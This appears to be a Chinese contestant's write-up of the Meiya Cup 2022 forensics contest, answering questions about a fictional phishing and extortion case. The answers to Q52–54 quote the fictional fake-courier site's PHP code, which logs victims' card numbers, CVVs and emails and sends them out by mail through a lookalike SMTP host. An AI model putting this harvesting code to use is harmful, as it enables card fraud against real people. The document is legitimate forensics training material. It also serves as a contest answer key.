美亚杯2022WP

MeiyaCup2022个人赛WP

2.34.36.41.46.47.52.54.60.62.66.为多选题

案件详情

于2022年10月，有市民因接获伪冒快递公司的电邮，不慎地于匪徒架设的假网站提供了个人信用咭资料导致经济损失。 警方追查下发现当中一名受骗市民男子李大輝 (TaiFai) 的信用卡曾经被匪徒在区内的商舖购物。 后来警方根据IP地址，锁定及拘捕了一名男子林浚熙 （阿熙 ChunHei），并于他的居所发现了一批相信曾被用作犯案的电脑及手机装置。 经调查后，警方发现阿熙除上述案件外，他亦牵涉其他的一些犯罪活动。警方的电子数据取证小组在现场作出初步了调查并对涉案装置进行了电子数据取证。请你根据得到的资料，协助将事件经过还原。

考虑到读音的问题，接下来的解析当中，ChunHei = 林浚熙,HiuLam = 王晓琳,TaiFai = 李大輝。

1.王晓琳在这本电子书藉里最后对哪段文字加入了重点标示效果 (Highlight)? (2分)

A.武松那日早饭罢
B.卿有何妙计
C.宝玉已是三杯过去了
D.就除他做个弼马温罢

这道题是和最后一道题联动的，直接放在最后一道题一并解析,答案为B

2.王晓琳的手机里有一个 ‘MTR Mobile (港铁)’ 的手机程序 (Mobile App)。 检视其数据库 (Database) 的数据，王晓琳于2022年10月11日 22:04 时将一行程加入书签 (Bookmark)，这段行程的起点及终点站包括? (2分)(多选)

A.青衣
B.尖沙咀
C.红磡
D.康城
E.沙田

将王晓琳的手机检材导入火眼,先找到mtr的安装位置,

再寻找得到其中修改时间晚于2022年10月11日 22:04的文件,

只剩下了一个,那就直接看,直接打开文件

3.王晓琳于2022年10月2日使用她的手机拍摄了多少张的照片? (以阿拉伯数字回答) (1分)

查看图片的修改时间，进入火眼的筛选，进入DCIM文件夹，再筛选扩展名为HEIC的，且修改时间介于2022-10-02 00:00:00 到 2022-10-03 00:00:00 的图片，得到90条记录，说明就是90条了

4.检视王晓琳的手机照片，她于2022年10月2日到过什么地方? (1分)

A.大榄麦理浩径
B.大潭郊游径
C.城门畔塘径
D.京士柏卫理径

找到其中一张图片，直接看(或者也可以看EXIF信息，那样更准，在比赛的时候，就直接看图片了，方便),于是乎，答案就是城门畔塘径。

5.李大辉使用的是一台LG V10的手机，它的型号是什么? (1分)

A.LGH961C
B.LGH960C
C.LGH961N
D.LGH960H
E.LGH961D

直接把检材导入火眼，看设备信息

最终获得答案型号为LG-H961N

6.李大辉的手机最常搜索的类别 (Category) 是什么? (1分)

A.运动
B.护肤品
C.旅游
D.学校

查看李大辉手机当中的百度分析，查看搜索记录，直接分析获得最多的是护肤品，像什么面膜、精华液之类的

7.李大辉最近光顾了一家美丰快运公司，这快递件的单号是什么? (不要输入符号及空白，以阿拉伯数字回答) (1分)

8.李大辉收到的电邮中有一个钓鱼链结 (Phishing Link)，这个链结的地址是什么? (1分)

A.https://bit.ly/5vM12
B.以上皆非
C.https://bit.ly/3yeARc0
D.http://bit.ly/Hell0

首先判断数据库存在哪，这个简单，利用mail的作为关键词进行检索，同时利用.db的后缀名进行筛选(这里说的不够严密,在安卓中数据库大概率会是SQLite,所以猜测是.db的后缀名进行筛选),

然后利用SQLiteStudio直接查看，因为一行太长了，为了查看方便,于是简单的SQL脚本

select messageId,fromAddress,snippet from messages;

9.承上题，这封电邮是从哪个电邮地址寄出的? (1分)

[email protected]
B.以上皆非
[email protected]
[email protected]

和上题一样的图。

10.承上题，寄出这封电邮的IP地址是? (2分)

A.10.13.105.56
B.以上皆非
C.65.54.185.39
D.58.152.110.218

11.李大辉手机有一个 ‘order.xlsx’ 的档案被加密了，解密钥匙是什么? (1分)

A.Nov2022!
B.2022_Nov!
C.20221101
D.P@ssw0rd!

先找到文件的位置，直接在文件系统中搜索order.xlsx的文件名找到文件,

既然问的是解密钥匙，答案一定在四个选项当中，直接逐个尝试过去，最终得到Nov2022!

12.香港的街道上每一枝街灯都有编号。 分析李大辉手机里的程序 ‘KMB 1933’， 哪一枝街灯在经度 (Latitude) 22.4160270000， 纬度 (Longitude) 114.2139450000 附近，它的编号是什么?(以大㝍英及阿拉伯数字回答) (2分)

先找到文件的位置，在“应用程序”当中搜索KMB，获得应用程序的包名

再利用包名进行路径的搜索，得到安装目录

最后找到KMB_20201208.db的文件路径,

最后，直接在数据库当中寻找，主要是看字段经度和维度

先假设全部都是街灯(资本家落泪),然后就是一道初中题目了,距离就是sqrt((x-x0)**2+(y-y0)**2),然后就是直接看。

select subarea,lat,lng from kmb_routestopfile_ST order by power((lat-22.416027)*(lat-22.416027)+(lng-114.213945)*(lng-114.213945),2);

可以直接找到距离为0的点，那就决定是它了，SC02-S-1100-0,答案SC02S11000

13.李大辉的手机里有一张由该手机拍的照片，照片的元资料 (Metadata) 曾被修改，这张照片的档案名是什么?(以大写英文及数字回答，不用回答副档名) (2分)

这题不难，只有一个文件的创建时间和修改时间不一样

文件名称就是20220922_152622.jpg，所以答案就是20220922152622JPG。

14.分析李大辉的手机里的资料，他在哪一间公司工作? (2分)

A.盛大国际有限公司
B.美丽好化妆品公司
C.步步高贸易公司
D.永恒化妆品公司

分析数据，直接在文件分类里面找，图片、视频、音频、网页文件都不太可能，几乎只剩下了压缩文档和文档，在里面逐个寻找，找到Staff card LI taihui.xlsx,火眼里面直接预览，或者可以利用暴力搜索获得结果,考虑到时间问题，暴力搜索其实更加节省精力。

15.林浚熙曾经以手机登录Google账户的验证码是什么? (不要输入符号，以大写英文及阿拉伯数字回答) (1分)

先把检材导入火眼，然后就可以在短信里面看到(这一道题其实还是好想的，手机登录验证码，基本都是短信)

16.林浚熙手机的 ‘WhatsApp’ 号码是什么? ( 号 码 ) @s.whatsapp.net? (以阿拉伯数字回答) (1分)

直接在WhatsApp分析当中寻找,获得答案85256412770

17.通过分析林浚熙手机的照片，判断他在何处偷拍王晓琳? (1分)

A.游泳池
B.交通工具
C.郊野公园
D.酒店房间

找到和WhatsApp中和王晓琳的聊天记录,找到照片,接下来就是个人生活经验了，不太可能是游泳池、郊野、交通工具,那就只剩下酒店房间了。

WhatsApp的分析数据直接看和王晓琳的。

18.林浚熙曾经删掉自己拍摄的照片，这张照片的档案名 (Filename) 是什么? (不要输入 ‘.’，以大写英文及阿拉伯数字回答。 如 Cat10.jpg，需回答CAT10JPG) (2分)

在“最近删除”当中，可以直接看到被删除的照片

答案呼之欲出了,IMG0444JPG

19.王晓琳曾经发送一个PDF档案予林浚熙，这个档案的文件签名 (File Signature) 是什么? (以十六进制数字回答首八位数值，如 F0A1C5E1) (2分)

首先找到文档pdf,导出之后改名为.xlsx,寻找文件签名

D0CF11E0

20.承上题，该PDF档案内包含一位曾经被骗的受害者资料。分析林浚熙手机的数据，这位受害者的英文名字是什么? (不要输入符号及空白，以大写英文回答) (2分)

21.分析林浚熙手机上的数据，他在2022年10月17日计划去什么地方? (2分)

A.沙田站
B.以上皆非
C.荃湾站
D.国际金融中心二期

第一步，首先是要找到相关的数据库文件或者.plist文件，既然与地点有关，导航必不可少。结果是找到了一个我根本没用过的软件（也有可能是因为我没用过苹果手机的关系），waze。

然后就是找到里面的user.db

在这里面就好找了，结合下一题，同一个行程还可以看到结束时间，直接在第一张表就能看到select name,end_time from events_places where end_time<1666022399 and end_time > 1665936000;

22.承上题，上述行程的结束时间是? (如答案为 16:01:59，需回答 160159) (2分)

时间也有了，124500

23.于林浚熙的手机里，在2022年9月1日 或以后，哪一张照片是由其他手机拍摄的，而它的档案名是什么?(不要输入 ‘.’，以大写英文及阿拉伯数字回答。 如 Cat10.jpg，需回答CAT10JPG) (2分)

24.根据照片的数据库 (Photos.sqlite) 资料，哪一个栏目标题 (Column Header) 可以显示这张照片的接收方式? (2分)

A.ZIMPORTEDBYBUNDLEIDENTIFIER
B.ZRECEIVEMETHODIDENTIFIER
C.ZIMPORTEDFROMSOURCEIDENTIFIER
D.ZRECEIVEDFROMIDENTIFIER

先搜索到文件,打开

然后select type, name, tbl_name from sqlite_master order by type;直接查看SQLite的字段名,只存在A选项,

25.承上题，这张照片通过什么方式接收? (2分)

A.WhatsApp软件传送
B.网页下载
C.蓝牙传送
D.以上皆非
E.Signal软件传送

26.承上题，这张照片原本的档案名 (Original Filename) 是什么? (不要输入 ‘.’，以大写英文及阿拉伯数字回答。 如 Cat10.jpg，需回答CAT10JPG) (3分)

27.林浚熙手机里有一个备忘录 (Notes) 被上了锁，这个备忘录的名称是什么? (以大写英文及阿拉伯数字回答) (1分)

28.承上题，上述备忘录的内容有一串数字，它是什么? (以阿拉伯数字回答) (2分)

29.林浚熙计算机 (Computer) 的操作系统 (Operating System) 版本是什么? (1分)

A.Windows 10 Home 21H2
B.Windows 10 Pro for Workstations 21H2
C.Windows 10 Pro 22H2
D.Windows 10 Pro for Workstations 21H1

仿真之后一眼看出来,Windows 10 Pro for Workstations 21H2

30.林浚熙计算机安装了什么品牌的虚拟专用网络 (Virtual Private Network - VPN) 软件? (不要输入符号及空白，以大写英文及阿拉伯数字回答) (1分)

在安装的软件当中搜索VPN，即可获得

31.承上题，分析该虚拟专用网络的日志 (Log)，他在哪天安装该虚拟专用网络? (如答案为 2022-12-29，需回答 20221229) (2分)

先用VPN作为关键词，扩展名为.log文件进行筛选搜索，其实就剩下了三个文件，

既然是找安装时间，那应该是-installer.log的文件，在仿真机里面打开，

这下可以印证确实是20220915，当然上一题也告诉了我们，安装时间是20220915

32.检视林浚熙计算机的数据，他使用哪种加密货币 (Cryptocurrency) 以支付虚拟专用网络软件? (以大写英文回答该加密货币的全名，如 BITCOIN) (1分)

在桌面上就是钱包，如果不熟悉的话，可以再搜索一下Electrum钱包。

足够说明它的用途，BITCOIN，真是谜底就在谜面上。

33.林浚熙的加密贷币钱包 (Cryptocurrency Wallet) 名称是什么? (不要输入符号，以大写英文及阿拉伯数字回答) (2分)

34.林浚熙计算机里安装了哪个浏览器 (Web Browser)? (1分)

A.Tor Browser
B.Microsoft Edge
C.Google Chrome
D.Opera
E.Internet Explorer

直接看分析结果,安装了Tor,Edge,Chrome,IE。

35.林浚熙使用浏览器 ‘Google Chrome’ 曾经浏览最多的是哪一个网站? (1分)

A.https://web.whatsapp.com
B.https://gmail.com
C.https://mail.google.com/mail
D.https://facebook.com

这个就没什么好办法,直接一个一个分析，

答案显而易见,https://web.whatsapp.com

36.除了上述网站,林浚熙曾使用浏览器 ‘Google Chrome’ 搜索过什么? (1分)

A.docker image教学
B.javascript教学
C.php sql教学
D.tor教学
E.electrum教学

在浏览器里面看历史记录-Journeys，里面可以找到，那答案当中都有教学，那就按照教学来搜索.

37.林浚熙的计算机安装了一个通讯软件 ‘Signal’，它的用戶資訊儲存路径是什么? (1分)

A.\Program Files (x86)\Signal
B.\Users\HEI\Desktop\Signal
C.\Users\HEI\AppData\Roaming\Signal
D.\Users\user\Roaming\Signal

逐个进行查找，最后在C选项中找到

DataBase都在这里面

38.通讯软件 ‘Signal’ 采用一个档案存放用户的聊天记录，它的档案名是什么? (不要输入 ‘.’，以大写英文及阿拉伯数字回答。 如 Cat10.jpg，需回答CAT10JPG) (2分)

在火眼当中使用跳转源文件

文件名db.sqlite ，答案就该是DBSQLITE

39.承上题，对上述档案迸行分析，林浚熙的联络人当中有多少人安装了Signal? (以阿拉伯数字回答) (3分)

首先尝试直接打开数据库,发现没法打开,发现加密了,那就SQL CiPher解密,密码在config.json里面

去掉他自己，还有四个人

40.林浚熙在 ‘Signal’ 曾经与某人对话，那人的手机号码是什么? 需要与区码 (Area Code) 一同回答 (以阿拉伯数字回答) (3分)

85270711901

41.承上题，两人在 ‘Signal’ 的对话中有些讯息 (Message) 包含附件，这些讯息的 ‘ID’ 包括? (2分)

A.9729bf92-ab9c-45f7-8147-66234296aele
B.5b9650fe-3bb6-4182-9900-f56177003672
C.46a8762b-78ea-49aa-a6f5-b24975ec189f
D.47233ffe-1a73-4b3d-b97c-626246ec3129

hasAttachments就是含有附件的字段，select * from messages where hasAttachments = 1;

答案为AC

42.承上题，林浚熙曾经于2022年10月20日轉账 (Transfer Money) 予上述对话人士, 那次轉賬的参考编号是什么? (以大写英文及阿拉伯数字回答) (3分)

直接在聊天记录里面查看

43.林浚熙的计算机安装了多少台虚拟机 (Virtual Machine - VM) ? (以阿拉伯数字回答) (1分)

A.2
B.4
C.1
D.3

我只能看到一个，还有一种更确定的方法，利用.vmx搜索，只有一个虚拟机

44.林浚熙的计算机里的虚拟机 (VM) 存放在什么路径? (1分)

A.\Program Files\Virtual Machines
B.\User\HEI\Roaming\Virtual Machines
C.\Users\Public\Documents\Virtual Machines
D.\Users\HEI\Documents\Virtual Machines

在工作区目录查看，答案D

45.虚拟机 (VM) 使用什么版本的作业系统 (Operating System) ? (1分)

A.CentOS Linux release 7.6.1810(Core)
B.CentOS Linux 7.5.1804 (Core)
C.Ubuntu 22.04.1 LTS
D.Ubuntu 20.04.5 LTS

刚刚仿真好，就看到了D

46.虚拟机 (VM) 中的文件传输服务器 (FTP Server) 有哪些用户? (2分)

A.man
B.nobody
C.root
D.admin
E.ftpuser

首先判断开了什么类型的FTP服务器

直接看到vsftpd，既然要看用户，那就直接看/etc/vsftpd.chroot_list文件，最后看到就两个

这里引用一下大佬的博客，如果不明白的话，可以看一看详解

https://www.cnblogs.com/halberd-lee/p/11734363.html

47.虚拟机设置了什么网页服务器 (Web Server)? (2分)

A.APACHE
B.NGINX
C.LIGHTTPD
D.WORDPRESS
E.IIS

看到分析结果，里面只有两个

剩下三个选项我都找不到，Nginx搜出来还是在Docker容器中的

48.网页服务器目录内有图片档案，而此档案的储存位置是? (1分)

A./var/www/post
B./var/www/html/post/src
C./var/www/html/post/css
D./var/www/html/post/vendor
E./var/www/html/post

直接一个一个看过去

49.分析网页服务器的网站数据，假网站的公司名称是什么? (1分)

A.Krick Post Global Logistics
B.Krick Global Logistics
C.Global Logistics
D.Krick Post

刚刚打开IP地址，发现是Apache的默认界面，想想也不太可能，看到第52题有process.php，那就先搜索process.php，找到目录

然后就可以看到了，加上一个/post/就可以了

50.检视假网站首页的显示， ‘AY806369745HK’ 代表什么? (1分)

A.邮件序号
B.邮件号码
C.邮件收费号码
D.邮件参考号码

可以看到，邮件号码

51.分析假网站的资料，当受害人经假网站输入数据后，网站会产生一个档案，它的档案名是什么? (不要输入 ‘.’，以大写英文及阿拉伯数字回答。 如 Cat10.jpg，需回答CAT10JPG) (2分)

先看文件目录

然后查看源代码，

既然resultFile = “vu.txt”，那就是写入这个了

52.分析假网站档案 ‘process.php’ 源码 (Source Code), 推测此档案的用途可能是? (2分)

A.发出邮件
B.改变函数
C.产生档案
D.更新数据库

上题可以说到一个用途，产生档案，下面就是发送邮件

use PHPMailer\PHPMailer\SMTP;
require_once __DIR__ . '/vendor/phpmailer/src/Exception.php';
$mail = new PHPMailer(true);
    $mail->isSMTP();
    $mail->Host = 'smtp.gmai1.com';
    $mail->SMTPAuth = true;
    $mail->SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS;
    $mail->Port = 587;
    $mail->Username = '[email protected]';
    $mail->Password = 'rtatsceucpacocbdacs';
    $mail->setFrom('[email protected]', 'Smith');
    $mail->addAddress('[email protected]', 'Tyler');
    $mail->IsHTML(true);
    $mail->Subject = "vu";
	$mail->Body = $message;
    $mail->AltBody = ' ';
    $mail->send();
?>

53.检视档案 ‘process.php’ 源码, 林浚熙的电邮密码是? (以大写英文回答) (1分)

$mail->Password = 'rtatsceucpacocbdacs';

电邮密码RTATSCEUCPACOCBDACS

54.分析档案 ‘process.php’ 源码, 它不会收集哪些资料? (2分)

A.电话号码
B.GPS位置
C.信用卡号码
D.短讯验证码
E.电邮地址

来看代码

$fOpen = fopen($resultFile, "a");
fwrite($fOpen, "Date & Time: ".$dateTime."\n");
fwrite($fOpen, "Card Holder: ".$holdername."\n");
fwrite($fOpen, "Card no.: ".$cardno."\n");
fwrite($fOpen, "cvv: ".$cvv."\n");
fwrite($fOpen, "expire date: ".$exp_mth."/".$exp_yr."\n");
fwrite($fOpen, "Email: ".$email."@".$email_domn."\n");
fwrite($fOpen, "Browser Info: ".$browser."\n");
fwrite($fOpen, "\n"); //End of Entry
fclose($fOpen);

收集信用卡号码和邮箱地址

55.虚拟机 (VM) 安装了 Docker 程序，列出一个以’5’作为开端的 ‘Docker’ 镜像 (Image) ID (以阿拉伯数字及大写英文回答) (2分)

56.Docker 容器 (Container) ‘mysql’ 对外开放的通讯端口 (Port) 是? (3分)

直接看到:::43306->3306/tcp，那就说明43306

57.Docker容器 ‘mysql’，用户 ‘root’ 的密码是? (以大写英文及阿拉伯数字回答) (2分)

说个简单的方法，别绕过密码，直接用history看一看

docker run --name mysql -p 13306:3306 -e MYSQL_ROOT_PASSWORD=2wsx3edc -d mysql:latest，说明密码2wsx3edc

58.Docker容器 ‘mysql’ 里哪一个数据库储存了大量个人资料? (以大写英文回答) (3分)

navicat 连接上，直接看到KRICKPOST

59.检视 Docker 容器 ‘mysql’ 内数据库里的资料，李大辉的出生日期是? (如答案为 2022-12-29，需回答 20221229) (3分)

19850214，数据库直接看

60.通过取证调查结果迸行分析 (包括但不限于以上问题及情节)，林浚熙的行为涉及哪一种罪案? (5分)

A.勒索金钱
B.传送儿童色情物品
C.抢劫
D.诈骗
E.购买毒品

前面说明了，至少有勒索金钱和诈骗

61.王晓琳手机的 ‘IMEI’ 号是什么? (以阿拉伯数字回答) (1分)

62.王晓琳的手机安装了什么即时通讯软件 (Instant Messaging Apps)? (1分)

A.WhatsApp
B.Signal
C.微讯 (WeChat)
D.QQ
E.LINE

先看到应用列表,再看到名称不为空,且类型为即时通讯的,答案获得ABC

63.王晓琳于什么日子和时间曾经通过即时通讯软件发出一个 ‘PDF’ 档案? (以时区UTC+8回答) (1分)

A.2022-09-30 18:30:28
B.2022-09-30 17:39:53
C.2022-10-01 17:39:53
D.2022-10-01 16:30:22

打开文件传输记录,本身有两个档案,但是时间匹配之后只剩下一个答案

64.承上题，这个 ‘PDF’ 档案的MD5哈希值 (Hash Value) 是什么? (以大写英文及阿拉伯数字回答) (1分)

65.王晓琳将这个 ‘PDF’ 档案发给哪一个用户, 而该用户的手机号码是什么? (1分)

A.85269707307
B.85297663607
C.85259308538
D.85246427813

图中可以直接看到85259308538

66.王晓琳发出这个 ‘PDF’ 档案的原因是什么? (1分)

A.错误发出
B.寻求协助
C.分享档案内容
D.无法开启

答案为BD,直接用生活经验分析

67.承上题，分析王晓琳与上述用户的对话，他们的关系是什么? (1分)

A.家人
B.客户
C.师生
D.同事

同上题图,应该是同事

68.王晓琳于何时要求上述用户删除一张照片? (1分)

A.2022-09-30
B.2022-10-06
C.2022-09-28
D.2022-10-03

直接看聊天记录,解决

69.承上题，该用户向王晓琳提出什么要求以删除这张照片? (1分)

A.性服务
B.金钱
C.毒品
D.加密货币

答案B,没什么好讲的,直接看聊天记录

70.王晓琳的手机里有什么电子书藉 (Electronic Book) ? (2分)

A.水浒传
B.三国演义
C.红楼梦
D.西游记

直接搜索Book，再看一眼，发现有很多有关于iBook的，那就再以iBook搜索

那就是这些了，逐个看过去，最终得知是三国演义，第一题甚至不需要看到具体内容都知道是有何妙计